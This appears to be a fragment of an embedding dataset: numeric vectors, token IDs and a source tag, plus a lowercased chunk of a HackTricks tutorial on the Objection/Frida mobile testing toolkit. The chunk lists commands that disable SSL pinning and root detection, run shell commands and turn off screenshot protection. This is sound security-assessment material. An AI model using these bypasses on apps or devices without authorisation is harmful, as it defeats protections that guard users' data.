0.031033778563141823, 0.3977680802345276, 0.05637418478727341, 0.5113282799720764, -0.8006625771522522, 0.7159644961357117, 0.44721752405166626, -0.23586520552635193, -0.5573904514312744, -0.20228150486946106, -0.11954674124717712, -0.45298096537590027, -0.5007358193397522, -0.7843657732009888, -0.12826229631900787, 0.9601699113845825, -0.6409136652946472, -1.554683804512024, 0.07004396617412567, -0.14445890486240387, -0.7108644247055054, -0.020293809473514557, 0.4520414173603058, 0.39433473348617554, -0.33312755823135376, 0.04224458709359169, -0.3638928234577179, 0.05097980797290802, 0.7167942523956299, 0.09428844600915909, 0.17674581706523895, 0.13280518352985382, -0.04879608005285263, 0.4782714545726776, -0.1656150370836258, 0.4296000897884369, -0.20060744881629944, -0.31073418259620667, 0.46934404969215393, -0.7579442858695984, -0.9426180720329285, 0.04831031337380409, -0.004133967217057943, 0.4263904094696045, -0.4168562889099121, 0.31022584438323975, -0.2534826695919037, 0.1898687332868576, -0.12570494413375854, 0.11806415766477585, 0.46191081404685974, 1.075936198234558, 0.35723578929901123, -0.21384412050247192, 0.3224097490310669, -0.7248492240905762, -0.4947112500667572, 0.1673351377248764, 0.7127653360366821, -1.7676959037780762, 0.7650429606437683, -0.656080424785614, -0.26090869307518005, 0.6029701828956604, -1.0940583944320679, -0.15467151999473572, 0.4293946921825409, 0.07937655597925186, 0.885191798210144, -0.4479845464229584, -0.3732566237449646, 0.5788300037384033, 0.03195548802614212, 0.39834681153297424, 0.8042052388191223, 0.1963830143213272, 0.4062560498714447, 0.5446752905845642, -0.7473523616790771, -0.0956435576081276, 0.42403045296669006, 0.7722036242485046, -0.47801274061203003, 0.13459941744804382, -0.17735235393047333, -0.8291706442832947, -0.00567174656316638, 0.6270209550857544, 0.3265242576599121, -0.3453395962715149, 1.0303435325622559, 0.7147912383079529, -0.7967692017555237, 0.15667776763439178, -0.21227844059467316, -0.15520626306533813, -0.9357578158378601, -0.006168907508254051, 0.3604317307472229, 0.09798910468816757, -0.5214041471481323, -0.7616255879402161, 0.10477518290281296, -0.9675659537315369, -0.15937751531600952, -0.43658941984176636, -0.929028332233429, -0.6342160105705261, -0.09566685557365417, 1.1983113288879395, 1.0241299867630005, -0.6562315821647644, -0.9823364615440369, 0.7428349256515503, 0.11423493921756744, -0.700293242931366, 0.23637311160564423, -0.26841652393341064, 0.13635921478271484, 0.4659701883792877, -0.0541120320558548, -0.586474597454071, -0.787606418132782, 0.005356728099286556, -0.29969486594200134, 0.5768311619758606, 0.4184711277484894, -0.28744930028915405, 0.44263869524002075, -1.113567590713501, 0.5295438170433044, -0.09433019161224365, 0.5726708173751831, 0.403105765581131, -0.6436073184013367, -0.9602307677268982, 0.12139944732189178, 0.8080815672874451, 1.0983819961547852, 0.07546988129615784, -0.6143301725387573, -0.911705732345581, 0.8466343879699707, -0.8370140194892883, -0.42959171533584595, -0.13774801790714264, 0.3595568537712097, -0.23928728699684143, 0.44609808921813965, 0.0674080178141594, 1.2132971286773682, -0.22730937600135803, 0.741450846195221, -0.6021198630332947, -0.5184860229492188, 1.4501621723175049, 0.12241456657648087, 0.03815615177154541, 0.7395384311676025, 1.0605396032333374, -0.3385041356086731, 0.16798490285873413, -0.6952648758888245, -0.991703450679779, 0.3011819124221802, -1.0741835832595825, -0.2023780792951584, -0.4563418924808502, -0.2102758288383484, 0.3905322849750519, -0.46869203448295593, 0.5208891034126282, 0.3077128529548645, 0.5458678007125854, -0.8356692790985107, -0.504205048084259, -0.3680639863014221, 1.0457199811935425, 0.20589035749435425, 0.3470720052719116, -0.43937918543815613, 0.5276321768760681, -0.046897709369659424, 0.45535117387771606, -0.36751481890678406, 0.3200463056564331, -0.20641635358333588, 0.08770313113927841, 0.9194055795669556, -0.6901741027832031, 0.9895592331886292, -0.29013973474502563, -1.0757125616073608, -0.040990885347127914, 0.0038964080158621073, 0.7864544987678528, -0.6546661853790283, 0.21099315583705902, 0.15036636590957642, -0.08218548446893692, -0.2692194879055023, 0.6234486103057861, -0.3007130026817322, -0.4031318128108978, 1.5352181196212769, 0.194739431142807, 0.6946607828140259, 0.38254818320274353, -1.0178585052490234, 0.22659534215927124, 0.6725543737411499, 0.02171410620212555, -1.347822666168213, 0.520368754863739, -0.19892804324626923, -0.02492096833884716, -0.3194202482700348, -0.16460701823234558, -0.0018698266940191388, -0.14397606253623962, 0.465694397687912, -1.3668584823608398, -0.2502741515636444, -0.08813029527664185, -0.14267843961715698, -0.18026648461818695, 0.37117037177085876, 0.6951072812080383, 0.1382271945476532, 0.4921007752418518, -0.29094597697257996, 0.43358418345451355, -0.1024661734700203, 0.3690984547138214, -0.2678464651107788, 0.06797309964895248, -0.6895307302474976, 0.9153996109962463, -0.21282804012298584, 0.17116059362888336, -0.45448553562164307, 0.11944008618593216, 0.44320711493492126, 0.4469447433948517, -1.0958348512649536, -0.40776315331459045, 0.44597259163856506, -0.6007887721061707, 0.447605162858963, 0.5776974558830261, -0.2915344536304474, 0.08626116067171097, -0.8273044228553772, -1.125099539756775, -0.1927047073841095, 0.4770423471927643, -0.5451549887657166, -0.42785200476646423, 0.651181161403656, -0.6018099188804626, 0.8924318552017212, -0.36616891622543335, 0.03306891769170761, 0.5759679675102234, -0.10902295261621475, -0.041494835168123245, -0.3196168839931488, 0.28582000732421875, -1.4714536666870117, 0.1899290829896927, -0.6289488673210144, -0.38568153977394104, 0.4942016899585724, 0.27842918038368225, 0.95014888048172, 0.39078810811042786, 0.5928404927253723, 0.3419586420059204, 0.13020402193069458, 0.45455285906791687, 0.28066959977149963, 0.7701141238212585, 1.5072931051254272, -0.5418975353240967, -0.15868344902992249, 0.45877715945243835, 0.19475574791431427, -0.5588253140449524, -0.2264363169670105, -0.37573832273483276, -1.0364160537719727, 0.22377322614192963, 0.45005911588668823, 0.28488796949386597, 0.44211235642433167, 0.9827478528022766, -0.19438819587230682, -0.4716273546218872, 0.26439428329467773, -0.3758973181247711, 0.8215868473052979, 0.7943035364151001, -0.19771583378314972, -0.7881108522415161, 0.7802765369415283, 0.0020569590851664543, 0.23928484320640564, -0.4344075620174408, 0.6239973306655884, -0.7780965566635132, -0.6723182201385498, 0.0749339610338211, 0.3112632632255554, -0.35023990273475647, -0.825824499130249, 0.47062915563583374, -0.18472866714000702, 0.3724575936794281, -0.18769937753677368, -0.12871167063713074, -1.0312119722366333, -0.15625032782554626, 0.04765666276216507, 0.01585358753800392, 0.7939391732215881, -0.43623650074005127, 0.3982938528060913, 0.8509861826896667, -0.8148987293243408, -0.2592694163322449, 1.1619092226028442, -0.27346235513687134, -0.35354477167129517, -0.8680699467658997, 0.5394823551177979, -0.112949900329113, 0.051075100898742676, 0.893386960029602, -0.19826270639896393, -0.8584175109863281, 0.6639772653579712, 0.05078651383519173, 0.09531942009925842, -0.02111220918595791, 0.2643320858478546, 0.7762826681137085, -0.585028886795044, -0.31874018907546997, 0.4284302294254303, 0.14099998772144318, -0.4727730453014374, 0.23679544031620026, -0.12021040171384811, 0.16639257967472076, -0.3133760392665863, 0.6968438029289246, -0.9766126275062561, -0.16325542330741882, -0.5403580665588379, -0.6857271790504456, 0.017243072390556335, -0.4845924377441406, -0.35173386335372925, -0.11314411461353302, -0.11898905038833618, 0.6845640540122986, -0.8484049439430237, -0.23660892248153687, 1.319279432296753, -0.4673885703086853, 0.7863876819610596, -0.5376479029655457, 0.39718014001846313, -1.184329867362976, -0.37076517939567566, -0.49125102162361145, 0.7300251126289368, -0.047574590891599655, -0.015302453190088272, -1.0887408256530762, 0.12832464277744293, -0.09454361349344254, 0.6227961182594299, -0.4718817174434662, 0.2581181526184082, -0.7678476572036743, -1.03563392162323, 0.3924707770347595, 0.6564921736717224, -0.5287023782730103, 0.5829214453697205, -0.3182510733604431, -0.4608110785484314, -1.0133016109466553, -0.8041709661483765, -0.8366681337356567, 0.04473095014691353, -0.0065514505840837955, -0.17315103113651276, 0.276203989982605, -0.3221588730812073, -0.15449994802474976, 0.9171823263168335, -0.7366647720336914, -0.9902710318565369, -0.33208927512168884, 0.19633030891418457, 0.05887869745492935, 0.4616541564464569, 0.5614233613014221, 0.7567905783653259, -0.17492073774337769, 0.16560307145118713, -0.17961208522319794, 0.005962506867945194, -0.32388925552368164, -0.12614236772060394, 0.7129755616188049, 0.14553628861904144, -0.7447619438171387, 0.11070594191551208, -0.2227214276790619, -0.5659759044647217, -0.014502503909170628, 0.6624376773834229, 0.014569718390703201, -0.24696017801761627, -0.30303752422332764, -0.30655044317245483, -0.186821848154068, 0.8425204157829285, 0.9345905184745789, 0.8114712834358215, 0.27130717039108276, -0.12813271582126617, -0.3923375606536865, 0.061587534844875336, -1.193238377571106, -0.30219295620918274, 1.0053082704544067, 0.11442159116268158, -0.18303869664669037, -0.6869595050811768, -0.4221426248550415, 0.39822834730148315, 0.832554042339325, 0.6194429397583008, -0.3633064329624176, -0.22820094227790833, -0.15201342105865479, 0.2056535929441452, -0.4537242352962494, 0.029411297291517258, -0.2811436653137207, 1.0165032148361206, -0.7424649000167847, -0.026975227519869804, 1.175625205039978, 0.454188734292984, -0.09708543121814728, 0.20920507609844208, -0.49412214756011963, -0.4955434203147888, 0.5474652647972107, 0.3603617250919342, 0.3419876992702484, 0.06995242834091187, -1.3973064422607422, 0.7825329899787903, -0.3911014497280121, 1.099678635597229, -0.4441436529159546, 0.31690797209739685, 0.693818986415863, -0.279142290353775, -0.6877238154411316, -0.5054576396942139, 1.7685072422027588, -0.12621217966079712, -0.18466441333293915, 0.7024396657943726, -0.35364586114883423, 0.11517373472452164, -0.15443232655525208, 0.8443198800086975, 0.5828477740287781, 0.01594286412000656, 0.18312309682369232, 0.022134799510240555, 0.37729060649871826, 0.32879167795181274, 0.2963184416294098, 0.08584630489349365, 1.2515454292297363, -0.3509959280490875, 0.6354710459709167, -0.002318178303539753, 0.13324151933193207, -0.28376415371894836, 0.25473400950431824, -0.2853393256664276, 0.3733236789703369, 0.07661883533000946, 0.16564351320266724, 0.11038660258054733, -0.33920085430145264, -0.3861393332481384, -0.35498666763305664, -0.2454107403755188, 0.4790826141834259, -0.25723832845687866, 0.47253093123435974, 0.6489125490188599, -0.3404410779476166, -0.04186449944972992, 0.6302071809768677, 0.8171700835227966, -0.49334999918937683, 0.43180006742477417, 0.41271981596946716, 0.5870920419692993, -0.5668724179267883, 0.39321163296699524, -0.7848385572433472, 0.29189354181289673, 0.47156044840812683, -0.5914303660392761, 0.3744777739048004, 0.7070796489715576, -0.27000027894973755, 0.12828844785690308, -0.07163392007350922, 0.27482151985168457, -0.46213993430137634, -0.4956776797771454, 0.37927424907684326, -0.4443219006061554, 0.03811497613787651, -0.012697458267211914, -0.9985939264297485, -0.5431724190711975, 0.5405502319335938, -0.04763321205973625, 0.12022379040718079, -0.5941790342330933, 0.23996543884277344, -0.43559718132019043, 1.8055886030197144, 0.21934568881988525, 0.3387764096260071, 0.17817042768001556, 0.14858156442642212, -0.23159854114055634, -1.4394605159759521, 0.1127297431230545, 0.49216583371162415, -0.2770398259162903, 0.09097423404455185, -0.6631959080696106, -0.2233896255493164, 0.24745388329029083, 0.7389110326766968, -1.4974831342697144, 0.46398934721946716, 1.189786434173584, -0.015674611553549767, 0.13235534727573395, 0.9674808382987976, 0.20982404053211212, 0.29570743441581726, -0.4669664800167084, -0.03945609927177429, -0.8129369616508484, -0.5372130274772644, -0.125716894865036, 0.9007568359375, -1.1497842073440552, -0.43197426199913025, 0.4694862961769104, -0.15063458681106567, 0.041573263704776764, -0.024006573483347893, 0.23908992111682892, -0.3495219945907593, 0.23010128736495972, 0.7226343750953674, 0.04500440135598183, 0.4885784387588501, -0.8183277249336243, -0.41554805636405945, 0.8963636755943298, 0.06026938930153847, -0.37346920371055603, 1.1077641248703003, 0.2619645893573761, -0.34869375824928284, -0.3449612557888031, -1.079054832458496, 1.3174136877059937, -0.02466260828077793, -0.6658638715744019, -0.6141400933265686, -0.8140629529953003, -0.8734761476516724, -0.15878939628601074, 1.1919481754302979, 1.0500271320343018, -0.5181081891059875, 0.3991795778274536, 0.48072585463523865, -0.6022045016288757, -0.8048610091209412, 0.7424799203872681, -0.9887638092041016, 0.40754398703575134, -0.1481133997440338, -0.30127817392349243, 0.8648759722709656, -0.8436700105667114, 3.5515823364257812, 1.0077096223831177, 1.2332322597503662, 0.28156301379203796, 0.41186609864234924, 0.6323773860931396, 1.4387669563293457, 0.5740099549293518, 0.6617467999458313, -0.32202640175819397, 0.6994390487670898, -1.4708601236343384, 0.055339742451906204, 0.29817333817481995, -0.4970057010650635, 1.5130966901779175, -0.0004826338845305145, 0.8575610518455505, -0.36649394035339355, -0.25684529542922974, -1.3623552322387695, -0.2074359804391861, 0.5089783668518066, 0.32805827260017395, -0.08081690967082977, -0.7431378364562988, -0.08153870701789856, -0.5876272916793823, -0.24058644473552704, 0.08928216248750687, 0.06237492337822914, -0.7176211476325989, 0.5745051503181458, 0.507847785949707, -0.09402844309806824, 0.16972601413726807, 0.41443246603012085, 0.4054233729839325, -0.48530107736587524, 0.9709131717681885, 0.008513495326042175, -0.3771965205669403, -0.08673384040594101, -0.09561596810817719, 0.3901018500328064, 0.5425965189933777, -1.0069541931152344, -0.8732666969299316, -0.771891176700592, -0.8403804302215576, 0.022258294746279716, -0.4326871633529663, 0.1770097017288208, -0.8441458344459534, -0.545388400554657, -0.5285046696662903, 0.6408577561378479, -0.4356442093849182, -0.3390038013458252, 0.07024618983268738, 0.2947631776332855, 0.219475656747818, -0.9962361454963684, 0.16574950516223907, -0.21372553706169128, 0.19820690155029297, 0.5187431573867798, 1.0328086614608765, 0.26158419251441956, -0.43623897433280945, -0.7094504237174988, -0.9166661500930786, -0.6159953474998474, -0.23386640846729279, -0.6506928205490112, 0.43935349583625793, -1.029717206954956, 0.1255224049091339, 0.3765921890735626, -1.0261259078979492, -0.7573960423469543, 0.2621456980705261, -0.40086668729782104, -0.7241350412368774, 0.5564553141593933, 0.07997013628482819, -1.4798330068588257, 0.05460255220532417, 0.9216403961181641, -0.4516410529613495, 0.33256658911705017, 0.8390640616416931, 0.2699485719203949, 0.20792816579341888, 1.2730823755264282 ]
[ 101, 2543, 15058, 7809, 2860, 12707, 2003, 2543, 15058, 10273, 15058, 2003, 1037, 2067, 10497, 1011, 2004, 1011, 1037, 1011, 2578, 3701, 2005, 4684, 4646, 1012, 2009, 2003, 4208, 2006, 9268, 1996, 3715, 1997, 4730, 1996, 2067, 1011, 2203, 4346, 1037, 3835, 17371, 2243, 2004, 2092, 2004, 2116, 2060, 5875, 2477, 2008, 27777, 1996, 8290, 2090, 1996, 4646, 1998, 1996, 2067, 1011, 2203, 1012, 4553, 2062, 2055, 2543, 15058, 1999, 1024, 1043, 21906, 1011, 2543, 15058, 4372, 2819, 3270, 3600, 22881, 2015, 6112, 102 ]
hack_tricks
428.txt
0
[CLS] objection tutorialregister - register - introductionobjection - runtime mobile explorationobjection is a runtime mobile exploration toolkit, powered by frida. it was built with the aim of helping assess mobile applications and their security posture without the need for a jailbroken or rooted mobile device. note : this is not some form of jailbreak / root bypass. by using objection, you are still limited by all of the restrictions imposed by the applicable sandbox you are facing. resumethe goal of objection is let the user call the main actions that offers frida. otherwise, the user will need to create a single script for every application that he wants to test. tutorialfor this tutorial i am going to use the apk that you can download here : app - release. zip2mbbinaryor from its original repository ( download app - release. apk ) installationpip3 install objectionconnectionmake a regular adb conection and start the frida server in the device ( and check that frida is working in both the client and the server ). if you are using a rooted device it is needed to select the application that you want to test inside the - - gadget option. in this case : frida - ps - uaiobjection - - gadget asvid. github. io. fridaapp explorebasic actionsnot all possible commands of objections are going to be listed in this tutorial, only the ones that i have found more useful. environmentsome interesting information ( like passwords or paths ) could be find inside the environment. envfrida informationfridaupload / downloadfile download < remote path > [ < local path > ] file upload < local path > [ < remote path > ] import frida scriptimport < local path frida - script > sslpinningandroid sslpinning disable # attempts to disable ssl pinning on android devices. root detectionandroid root disable # attempts to disable root detection on android devices. android root simulate # attempts to simulate a rooted android environment. exec commandandroid shell _ exec whoamiscreenshotsandroid ui screenshot / tmp / screenshotandroid ui flag _ secure false # this may enable you to take screenshots using the hardware keysstatic analysis made dynamicin a real application we should know all of the information discovered in this part before using objection thanks to static analysis. anyway, this way
[ 0.3216358423233032, 0.0005892746848985553, -0.3382479250431061, -0.11114814877510071, -0.08650471270084381, 0.03237248584628105, -0.37375608086586, 0.545811653137207, 0.6725988984107971, 0.6061155796051025, 0.5493230819702148, 0.7837963700294495, 0.5395219922065735, -0.6228273510932922, -0.5552898645401001, 0.10064490139484406, -0.29421257972717285, -0.09850535541772842, -0.4890822172164917, -0.24372407793998718, 0.10504624247550964, -0.15070891380310059, -0.8221566677093506, -1.0002424716949463, -0.2892795503139496, 0.20142295956611633, 0.19414547085762024, 0.03261319547891617, 0.7135183811187744, 0.6239809393882751, 0.5362861752510071, -0.49631667137145996, -0.0687502920627594, -0.42820340394973755, 0.2205754518508911, -0.2567701041698456, 0.9447571039199829, -0.17861320078372955, 0.3728824257850647, -0.7420012950897217, 0.4294265806674957, -0.23860356211662292, 0.16903840005397797, -0.1484760046005249, -0.7844812273979187, -0.7200530767440796, -0.05673788860440254, -0.3161042332649231, 0.16940703988075256, -0.47677546739578247, 0.5246897339820862, 0.3248269557952881, -0.33936503529548645, -0.11397715657949448, -0.21055151522159576, -0.4267529547214508, 0.210835799574852, -0.0789254903793335, -0.35762226581573486, 0.5232221484184265, -0.03176256641745567, 0.7106556296348572, 0.34561288356781006, -0.390827476978302, 0.08776085078716278, 0.5239512920379639, 0.136492058634758, -0.10936012119054794, -0.058872103691101074, -0.53908771276474, -0.35872507095336914, 0.6792006492614746, -0.21733419597148895, -0.5831246972084045, -0.07190319895744324, 0.03822259604930878, -0.27385273575782776, -0.9298370480537415, 0.30295321345329285, 0.4663653075695038, -0.00938784796744585, 0.44831734895706177, 0.03947784751653671, -0.6095752716064453, -0.3180473744869232, 0.06060154363512993, 0.614023745059967, 0.7802065014839172, -0.3143938183784485, 0.39381831884384155, 0.3102859556674957, 0.2647012174129486, -0.8502967953681946, 0.08767103403806686, 0.5170500874519348, 1.2528314590454102, -0.19338908791542053, 0.10709892213344574, 0.29537177085876465, -0.27973759174346924, 0.5612595677375793, 0.9451479315757751, -0.05307590961456299, 0.3674818277359009, -0.2245502769947052, 0.45201578736305237, -0.26326075196266174, -0.02683565951883793, 0.09542647004127502, -0.3110654056072235, 0.7266453504562378, 0.09969070553779602, 0.4757520854473114, -0.0842212587594986, -0.8534705638885498, 1.0891070365905762, 0.7877559661865234, 0.02543509379029274, -0.4056355059146881, 0.15711118280887604, 0.34531477093696594, 0.2592536211013794, 0.20049424469470978, -0.021152017638087273, 0.35853031277656555, 0.21399399638175964, 0.16560840606689453, 0.2526147663593292, -0.05271696671843529, -0.7248015403747559, 0.3393133282661438, -0.12164988368749619, 0.6594625115394592, 0.4774231016635895, -0.6287893056869507, -0.04389752075076103, -0.06357774138450623, 0.02952895499765873, 0.41588857769966125, -0.7180274724960327, 0.09940611571073532, 0.985204815864563, 0.32515260577201843, 1.4828565120697021, 0.9605734348297119, -0.1248343363404274, -0.2400304228067398, -0.06636518985033035, -0.2984340488910675, 0.4438369572162628, -0.2727729380130768, -0.06651505082845688, 0.4629915952682495, -0.09366949647665024, -0.2816563546657562, -0.45317986607551575, -0.11580489575862885, 0.2869122326374054, 0.01783621497452259, -0.07749470323324203, -0.03090379387140274, 0.7468889355659485, -0.49316585063934326, 0.10713738203048706, 0.46151456236839294, -0.013524794951081276, -0.2548653781414032, 0.13659605383872986, 0.36942970752716064, 0.2682371139526367, 0.18450602889060974, 0.3780878186225891, 0.36095476150512695, -0.13363862037658691, 1.097679853439331, 0.44806045293807983, 0.2979285717010498, -0.07276876270771027, -0.055385034531354904, -0.011803791858255863, -0.7414552569389343, 0.4382164180278778, -0.1423467993736267, 1.08248770236969, 0.03692726045846939, 0.20111876726150513, -0.0900958999991417, -1.0081137418746948, -0.22451630234718323, -0.3840595483779907, -0.4953625798225403, 0.19261015951633453, -0.3218192458152771, 0.7926062345504761, 1.112675428390503, 0.49095767736434937, -0.7793140411376953, -0.09246084094047546, 0.061400022357702255, -1.4173424243927002, -0.42236071825027466, 0.2076389640569687, -0.45373421907424927, 0.967604398727417, -0.247874453663826, -0.25497519969940186, 0.3763465881347656, 0.5716910362243652, 0.2032758891582489, 0.6807633638381958, 0.5593929290771484, 0.1003880575299263, -0.923974871635437, -0.0742163360118866, 0.03918817266821861, -0.5883179306983948, 0.0010350894881412387, 0.3006133437156677, 0.175484299659729, 0.633875846862793, 0.4161345362663269, 0.3161034882068634, 0.8938134908676147, 0.7173830270767212, -0.13066399097442627, -0.1279558390378952, -0.2458920180797577, 0.01868053711950779, -0.3008945882320404, 0.6854459643363953, 0.12533369660377502, 0.7198285460472107, 0.184431254863739, 1.1208604574203491, -0.3926307260990143, -0.07819060236215591, 0.23033049702644348, 0.3103944957256317, 0.20224915444850922, -0.20089282095432281, -0.16251038014888763, 0.811651349067688, 0.5316491723060608, 1.112480878829956, 0.015571570955216885, 0.0289719607681036, 0.08267755061388016, 0.50669926404953, 0.4119679927825928, 0.42033812403678894, -0.23967154324054718, 0.8132860660552979, 0.07117263972759247, -0.12506133317947388, -0.8699183464050293, -0.5853214263916016, 0.8252078890800476, 0.8616173267364502, -0.5343557000160217, -0.8753190040588379, 0.026165377348661423, -0.16199342906475067, -0.40139296650886536, -0.33826589584350586, 0.08507377654314041, -0.038417231291532516, -0.6643731594085693, 0.08074136078357697, -0.032189641147851944, -0.827825129032135, -0.9183392524719238, 0.024014310911297798, -1.3078534603118896, -0.5459417104721069, -0.9663135409355164, -0.02480468526482582, 0.3279116451740265, 0.09362157434225082, 0.5850651264190674, -0.19696301221847534, -0.7492596507072449, -0.21508179605007172, -0.21174907684326172, 0.8493313789367676, 0.17070446908473969, -0.5104537010192871, -0.5529375076293945, -0.6674724817276001, -0.02768801525235176, 0.30411291122436523, 0.025044865906238556, -0.3036144971847534, -0.5200123190879822, -0.3306257724761963, -0.11882608383893967, -0.1381317377090454, 0.12062957882881165, 0.05558381229639053, -0.07702543586492538, -0.024187693372368813, -0.09045667946338654, 0.2948482632637024, 0.18900571763515472, -0.33258143067359924, -0.2517554759979248, 0.15582624077796936, 0.3613935112953186, -0.7973017692565918, 0.7761421799659729, 0.3714112639427185, -0.6605491638183594, 0.3798292279243469, -0.20348712801933289, 0.4342882037162781, -0.5266667008399963, 0.6457178592681885, 0.6861454248428345, -0.09197716414928436, -0.05659467354416847, -0.4210625886917114, 0.4037582278251648, -0.32535770535469055, -0.7407488822937012, 0.10270368307828903, -0.21641063690185547, 0.3961891829967499, -0.5189743638038635, -1.2712136507034302, 0.4204143285751343, 0.03623282164335251, -0.11223848909139633, -0.787671685218811, -0.5856872200965881, 0.8519203662872314, -0.47768455743789673, 0.49544665217399597, -0.3423103988170624, -0.9716783165931702, -0.24198459088802338, -0.01616711914539337, 0.18209877610206604, -0.5454280376434326, 0.274587482213974, -0.17426691949367523, -0.022415218874812126, 0.3687313199043274, 0.5401064157485962, -0.835913896560669, -0.14536263048648834, 0.024815397337079048, -0.5005025267601013, -0.5557206273078918, -0.28169265389442444, 0.0804898664355278, 0.21725676953792572, 0.6131365299224854, -0.5565211772918701, 0.047117192298173904, 0.23011255264282227, 0.6250497698783875, 0.12253224849700928, 0.594687819480896, 0.6962811946868896, -0.10700314491987228, -0.517643928527832, -0.6536243557929993, 0.20787572860717773, 0.35943421721458435, 0.14059674739837646, -0.14480175077915192, 0.07602401077747345, -0.7739349007606506, -0.4555623531341553, 0.2875637412071228, -0.4385724663734436, -0.7735486030578613, 0.4710555970668793, -0.2313077598810196, 0.8051162958145142, -0.3236921429634094, 0.08334343135356903, -0.35298508405685425, -0.15370696783065796, 0.6961904168128967, 0.29303935170173645, -0.01381264254450798, -0.1118534505367279, -0.23952467739582062, 0.17210999131202698, -0.3188881278038025, -0.07018580287694931, 0.06699542701244354, 0.2930670976638794, 0.12743154168128967, -0.7211642265319824, -0.43523943424224854, 0.5000205636024475, 0.805074155330658, 0.7040045857429504, 0.6695412397384644, 0.2743488848209381, 0.2446715384721756, -0.5619964003562927, 0.1119486391544342, -1.1793837547302246, -0.042517147958278656, 0.03687140718102455, 1.0022945404052734, -0.7349525094032288, 0.2965599298477173, -0.4206311106681824, -0.44331905245780945, -0.23137900233268738, 0.08595836162567139, 0.7251615524291992, -0.06496791541576385, -0.6966202259063721, -0.143698588013649, -0.11380019038915634, -0.14578115940093994, -0.2862118184566498, -0.2137821912765503, -0.04410563409328461, 0.28844931721687317, 0.6517344117164612, -0.8883534669876099, -0.43871766328811646, -0.8114137649536133, 0.07610773295164108, 0.14106297492980957, -0.5061054825782776, -0.14258866012096405, -0.639215886592865, -0.17020198702812195, -0.9668567776679993, -0.2064586877822876, 0.6348105669021606, 0.05540250614285469, 0.47015124559402466, -0.6468269228935242, -0.1715862900018692, 0.801331639289856, -0.48455989360809326, -0.3789045214653015, -0.4227794110774994, 0.18827049434185028, 0.3755860924720764, 0.6472535133361816, 0.050065528601408005, -0.5011646151542664, 0.33133405447006226, -0.846177339553833, 0.6718052625656128, -0.6164562702178955, 0.2015063613653183, -0.20206283032894135, -0.17183026671409607, 0.40763822197914124, 0.9207167029380798, -0.6801890730857849, -0.2771728038787842, -0.4921676516532898, -0.0756266713142395, -0.35902276635169983, -0.671200156211853, 0.20408761501312256, -0.13346073031425476, -0.31099218130111694, 0.09566158801317215, 0.5587286353111267, -0.10562491416931152, 0.643947958946228, 0.4886498749256134, -0.6967542767524719, 0.4218636751174927, -0.5712553262710571, 0.3490740656852722, -0.04929237812757492, -0.22506935894489288, -0.13395458459854126, -1.1937687397003174, 0.7817585468292236, 0.8432980179786682, 0.3661895990371704, -0.5964102149009705, -0.10235422849655151, 0.08838947862386703, -0.34481826424598694, -0.03931202366948128, 0.7255343794822693, 0.19997647404670715, -0.0999087318778038, -0.596504807472229, 0.05541526526212692, -0.7653422355651855, -0.91943359375, -0.4541619122028351, 0.23132136464118958, 0.2260741889476776, 0.05967877432703972, 0.40326499938964844, -0.2350890338420868, -0.28273311257362366, 0.44436368346214294, -0.07143534719944, 0.25619077682495117, -0.9130398631095886, -0.12747986614704132, -0.15236659348011017, 0.14828820526599884, -0.7004135251045227, 0.3381160497665405, -0.057002630084753036, 0.0070752850733697414, -0.7627756595611572, 0.2559930384159088, -0.04842003062367439, -0.44347116351127625, -0.23994073271751404, 0.86992347240448, -0.48268118500709534, -0.48556122183799744, 0.03239982947707176, 0.40566739439964294, 0.04480713605880737, 0.1953071504831314, 0.196761816740036, -0.673823893070221, -0.8076142072677612, -0.5000026226043701, 0.2419237345457077, -0.5433400273323059, 0.29003775119781494, -0.5584441423416138, -0.6698112487792969, -0.7299293875694275, -0.7444429397583008, 0.14606398344039917, -0.518915593624115, 0.041745271533727646, -0.46624132990837097, 0.3465985059738159, -0.3595839738845825, -0.42769405245780945, -0.5868725776672363, -0.021742936223745346, 0.46733102202415466, 0.691998302936554, 0.3098914623260498, 0.11518234759569168, 0.18830442428588867, 0.03852873295545578, 0.2660439908504486, 0.35308438539505005, -0.05249381065368652, -0.5569157004356384, 0.2170189917087555, -0.4131375551223755, -0.3472878932952881, 0.73606276512146, -0.39332571625709534, -0.08590786159038544, -0.4508006274700165, 0.33066630363464355, -0.1421344131231308, -0.8180829286575317, -0.2043716162443161, -0.3125722110271454, 1.5475677251815796, -0.03502817451953888, -0.30311119556427, -0.39976128935813904, 0.7206729054450989, 0.6895249485969543, -0.01238833088427782, -0.8728121519088745, 0.501488447189331, -0.771407961845398, -0.8929067850112915, 0.4696103036403656, -0.09394795447587967, -0.6429762244224548, -0.3034653067588806, -0.19333060085773468, 0.5538727641105652, -0.14405646920204163, -0.3383750915527344, 0.8054667115211487, -0.29082390666007996, 0.060154858976602554, -0.8768168687820435, 0.8065168261528015, 0.27820515632629395, -0.37115561962127686, -0.1264747977256775, -0.4505033791065216, 0.1967196762561798, 0.7051228880882263, 0.0243934765458107, -0.3138061463832855, -0.9202170372009277, -0.17022213339805603, 0.2883649468421936, -0.10964556783437729, 0.6991089582443237, -0.07999169826507568, -1.455560564994812, -0.5044568777084351, 0.15783549845218658, -0.4739113450050354, -0.5790722966194153, 0.25993314385414124, 1.077425479888916, 0.4910009801387787, -0.06912389397621155, 0.27725082635879517, 0.3968571126461029, -0.5815086960792542, 0.8997233510017395, -0.43917378783226013, -0.6820301413536072, 0.6082577705383301, 0.42861226201057434, -0.983698308467865, -0.751870334148407, -0.4006780683994293, -0.36917582154273987, 0.05910574272274971, -0.5114433765411377, -0.5187473893165588, -0.4899064600467682, 0.19406597316265106, 0.06084198132157326, 0.5410982966423035, -0.11971565335988998, 0.5968896150588989, -0.8642977476119995, 0.2912956774234772, -0.15728232264518738, 0.04971157759428024, 0.7151051163673401, -0.7263577580451965, 0.0013067484833300114, -0.5375534296035767, 0.1574902981519699, -0.06297159940004349, -0.013171503320336342, 0.3903614580631256, -0.2453940212726593, 0.48271799087524414, 0.42819884419441223, -0.14510290324687958, 0.46201902627944946, -0.2799733579158783, 0.6810515522956848, 0.9175721406936646, -0.5162895321846008, -0.9051697254180908, -0.4355485737323761, 0.5066445469856262, 0.34102505445480347, 0.2959958612918854, -0.764042854309082, -0.6075853109359741, 0.2734260857105255, 0.24167366325855255, 0.14641211926937103, -0.9687262773513794, -1.0644992589950562, -0.3023245632648468, -0.14582514762878418, 0.3068128824234009, 0.08876416832208633, 0.240702822804451, 0.6328793168067932, -0.22696638107299805, -0.09137853980064392, 0.03791067749261856, 0.08145923167467117, -0.45396631956100464, -0.174198716878891, -0.5954551100730896, 0.3253495693206787, -0.40629395842552185, -0.6514226794242859, 0.07493368536233902, -0.23716412484645844, -0.12836913764476776, 